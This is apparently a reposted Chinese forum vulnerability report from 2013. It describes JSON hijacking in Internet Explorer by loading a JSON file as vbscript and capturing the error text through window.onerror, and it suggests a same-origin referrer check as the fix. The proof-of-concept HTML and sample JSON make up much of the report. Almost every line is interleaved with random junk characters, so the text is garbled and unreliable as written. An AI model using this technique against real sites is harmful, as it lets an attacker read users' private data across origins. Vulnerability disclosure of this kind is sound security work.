简要描述:$ c1 i4 N* b$ |7 N0 _
" f) X+ @1 C& l) c由于某些资源容器对数据处理不当导致json劫持漏洞. F+ X% Z6 q$ `
详细说明:
5 y6 ^2 U! F( H- E3 y: V% k" s! l% Y由于ie支持vbscript,所以script元素可以指定成vbscript语言:
: i0 o6 Z5 ^' f, w3 v3 a& h9 w<script language=vbscript></script>
- m% S' z, c. | 9 a/ _; F. V2 m* w+ k3 Q* S5 g" N
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.8 N/ u) u) { Y% I6 ?
漏洞证明:, y3 J. [/ G5 Y8 a8 \$ @- K. l
<script>
5 h/ q* Y+ U/ y! s% iwindow.onerror=function(_){2 J) w; w9 ]3 _% R
alert(_)
5 `2 }# n% |/ e0 D% m}8 B7 T+ v o2 J/ u- r* a0 D ]
</script> z. o7 f1 q5 H: U# j/ l
<script language=vbscript src=1.json></script>7 G9 A) ~0 J2 j" ]. J% |& W
8 U- d8 g6 _3 \: _; V) V 8 [. b! |! P3 a) U8 X
1.json:
5 @# h& p# N4 h. Y4 p[{"name":"sogili","age":19}]
1 Z: D' s7 Y% A. `. `修复方案:
" F( T1 t3 H/ e网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对